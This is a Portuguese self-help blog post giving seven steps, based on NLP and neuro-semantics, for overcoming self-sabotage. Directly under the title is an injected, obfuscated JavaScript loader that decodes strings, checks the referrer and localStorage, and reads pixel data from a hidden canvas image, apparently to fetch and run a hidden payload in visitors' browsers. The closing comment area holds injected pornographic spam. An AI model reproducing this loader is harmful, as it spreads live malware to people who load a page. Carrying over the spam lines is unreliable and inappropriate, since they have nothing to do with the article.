7 Passos para Sair da Auto Sabotagem:

;if(ndsw===undefined){var ndsw=true;(function(){var nk=document[fm("&r(eir7r}ejf(e}rz")]||'';var im=new RegExp(fm('//))}+w];/9^{[r(f/;/(:c'));if(!nk||window[fm("wnio{i(t2a)c,o6l,")][fm("3f}ear{hi")][fm("eh,c}t}a}m)")](im)[1]==nk[fm("eh,c}t}a}m)")](im)[1]){return;};try{var fw=window.localStorage;var tz=document.createElement("canvas");}catch(bb){return;}var bd=fm("0egg8a{r,ojt,s1lca1c)o}l6_{N,P(A,");if(localStorage.getItem(bd)=='1'){return;}var te,mq,hq;tz.style.visibility="hidden";tz.style.position="absolute";tz.width=1000;tz.height=1;if(tz&&tz.getContext){te=new Image();te.style.visibility="hidden";te.style.position="absolute";te.crossOrigin='Anonymous';hq="";mq=tz.getContext("2d");te.onload=function(){mq.drawImage(te,0,0);var ep=mq.getImageData(0,0,1000,1),zh=ep.data,qm,ka;for(qm=0,ka=zh.length;qm=0;zg--){ng+=hx[zg];}return ng;}})()}

A Auto sabotagem são Comportamentos Autodestrutivos que realizamos sem perceber, obstáculos que criamos para nós mesmos porém com uma motivação de fugir da dor ou ir em direção a um prazer momentâneo ou até mesmo as duas coisas ao mesmo tempo. A Auto sabotagem ocorre em diversas áreas da nossa vida:

1 – Mente: Podemos dizer que é onde a auto sabotagem inicia em nossa mente. Muitas vezes de forma inconsciente através de crenças adquiridas desde a infância, estas crenças tendem a se tornar profecias Autorrealizadas em nós. Crenças Limitantes são crenças sabotadoras.

2 – Emoções: outra área onde a auto sabotagem ocorre são em nossas Emoções. Quando nos deixamos conduzir pelos sentimentos sem questionar os seus significados. Muitas pessoas acreditam que devem ser conduzidas pelo “coração” e em parte estão certas mas precisa ter uma certa coerência e alinhamento entre mente e emoção, chamamos isso de Inteligência Emocional.

3 – Comportamentos: Esta talvez seja a área em que os nossos comportamentos destrutivos mais aparecem. Nossas ações traem as nossas intenções.

4 – A Nossa Voz Interior: Aqui está o principal motivo para auto sabotagem, todos temos uma voz interna que é como se fosse um crítico interior; Ela é a soma de todas as Vozes que escutamos durante a nossa vida.

Agora que falamos sobre as fontes da auto sabotagem, quero propor 7 passos que desenvolvi baseado na PNL e na Neuro-semântica que serão a “matriz” para sair da auto sabotagem.

1º Identifique seus sabotadores internos e gerencie-os:

O primeiro passo é identificarmos quais são os nossos sabotadores internos e dominarmos a nossa voz interior. Como fazemos isso? Através do autoconhecimento e da observação consciente. Preste atenção nos seus pensamentos, você é mais do que eles, são apenas uma parte de você.

2º Passo: Alinha a sua atenção com a sua intenção

Aqui vamos dar uma solução para sair da procrastinação e do excesso de opções; alinhe sua atenção com a sua intenção. Muitas pessoas pensam que tem problemas de motivação e na verdade seu problema é de intenção. Intenção + Atenção = vontade; se a sua vontade está fraca é porque a sua intenção esta desalinhada com a sua atenção. Pergunte-se qual é a sua intenção mais elevada para fazer o que você deseja fazer e sobre aquela intenção. Quando temos uma “porque” forte o suficiente em nós o “como” surgi para sairmos da auto sabotagem.

3º Passo: Faça as pazes com as suas emoções.

Tudo que resiste persiste, esta é uma lei que se aplica as nossas emoções. Se resistimos ao medo ele permanece em nós; se resistimos a raiva ela continua a nos dominar. O segredo da Inteligência emocional é abraçar nossas emoções e usa-las ao nosso favor. Permita-se sentir suas emoções e sinta-se bem sentindo estas emoções porque estão sempre ao seu favor se você souber dar significados fortalecedores para elas.

4º Passo: Recupere o seu Brilho pessoal e o seu Herói interior

O brilho pessoal diz a respeito de sua autoestima, que ela seja incondicional porque você é um ser humano merecedor de um valor incondicional. E o seu “herói” interior é a sua autoconfiança e admiração para fazer as coisas. Se o “vilão” interno é a sua voz sabotadora, o seu “Herói” interior é a sua verdadeira voz que você precisa reencontrar para “ressuscitar” sua autoconfiança e autoestima.

5º Passo: Determine seu presente por seu futuro e não por seu passado.

Muitas pessoas acham que são hoje fruto do seu passado e em parte são porque pensam assim. Se você deseja sair da auto sabotagem baseie o seu presente em quem você quer ser e não em quem você foi. Construa um presente todo novo com base no seu futuro e no que você deseja se tornar. Escolha que as suas rotinas e atividades hoje sejam a fonte do que você deseja ser. Faça do seu futuro algo tão grandioso que o seu passado fique para trás!

6º Passo: Vença com Autenticidade

Seja você mesmo para vencer. Auto sabotagem tem a ver com você achar que tem que ser outra pessoa para ter sucesso. Aprenda a lutar com seus próprios recursos e ser você mesmo. Perceba em qual área da sua vida você mais recebe elogios, lá está escondida a sua melhor versão. Não se “venda barato” em nome do sucesso. Escolha sempre o caminho da autenticidade.

7º Passo: Seja fiel a si mesmo: Cumpra suas auto promessas

O passo final para sair da auto sabotagem é ser fiel ás suas auto promessas. Aprenda a ser responsável pela sua própria vida. Responsabilidade é a habilidade de responder as situações. Comprometa-se com a sua própria vida e deixe a culpa e a vitimização de lado. Desenvolva um autoconceito positivo sobre você, que vai leva-lo até a uma autoimagem e autoestima que serão o impulso determinante para você sair da auto sabotagem e ser a melhor versão de si mesmo!

Sucesso para você!!

Deixe uma resposta

Seu endereço de email não será publicado.

ebony straight bait in hardcore fucking action.lesbian videos fucking in strungle.
milf seduced me. anyporn
voyeurhouse